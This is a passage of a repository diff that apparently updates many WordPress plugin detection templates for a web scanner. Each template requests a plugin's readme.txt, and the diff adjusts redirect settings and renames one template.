- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/akismet/readme.txt"

3
technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt"

3
technologies/wordpress/plugins/all-in-one-seo-pack.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt"

3
technologies/wordpress/plugins/all-in-one-wp-migration.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt"

3
technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt"

3
technologies/wordpress/plugins/amp.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/amp/readme.txt"

3
technologies/wordpress/plugins/antispam-bee.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt"

3
technologies/wordpress/plugins/astra-sites.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt"

3
technologies/wordpress/plugins/astra-widgets.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt"

3
technologies/wordpress/plugins/autoptimize.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt"

3
technologies/wordpress/plugins/backwpup.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt"

3
technologies/wordpress/plugins/better-search-replace.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt"

3
technologies/wordpress/plugins/better-wp-security.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt"

3
technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt"

3
technologies/wordpress/plugins/breadcrumb-navxt.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt"

3
technologies/wordpress/plugins/broken-link-checker.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt"

3
technologies/wordpress/plugins/child-theme-configurator.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt"

3
technologies/wordpress/plugins/classic-editor.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt"

3
technologies/wordpress/plugins/classic-widgets.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt"

3
technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt"

3
technologies/wordpress/plugins/cloudflare.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/cloudflare/readme.txt"

3
technologies/wordpress/plugins/cmb2.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt"

3
technologies/wordpress/plugins/coblocks.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt"

3
technologies/wordpress/plugins/code-snippets.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt"

3
technologies/wordpress/plugins/coming-soon.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt"

3
technologies/wordpress/plugins/complianz-gdpr.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt"

3
technologies/wordpress/plugins/contact-form-7-honeypot.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt"

3
technologies/wordpress/plugins/contact-form-7.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"

3
technologies/wordpress/plugins/contact-form-cfdb7.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt"

3
technologies/wordpress/plugins/cookie-law-info.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt"

3
technologies/wordpress/plugins/cookie-notice.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt"

3
technologies/wordpress/plugins/creame-whatsapp-me.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt"

3
technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt"

3
technologies/wordpress/plugins/custom-css-js.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt"

3
technologies/wordpress/plugins/custom-fonts.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt"

3
technologies/wordpress/plugins/custom-post-type-ui.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt"

3
technologies/wordpress/plugins/disable-comments.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt"

3
technologies/wordpress/plugins/disable-gutenberg.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt"

3
technologies/wordpress/plugins/duplicate-page.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt"

3
technologies/wordpress/plugins/duplicate-post.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt"

5
technologies/wordpress/plugins/duplicator.yaml
View File

@ -1,7 +1,7 @@
id: wordpress-duplicator
info:
name: Duplicator WordPress Migration Plugin Detection
name: Duplicator WordPress Migration & Backup Plugin Detection
author: ricardomaia
severity: info
reference:
@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt"

3
technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt"

Some files were not shown because too many files have changed in this diff Show More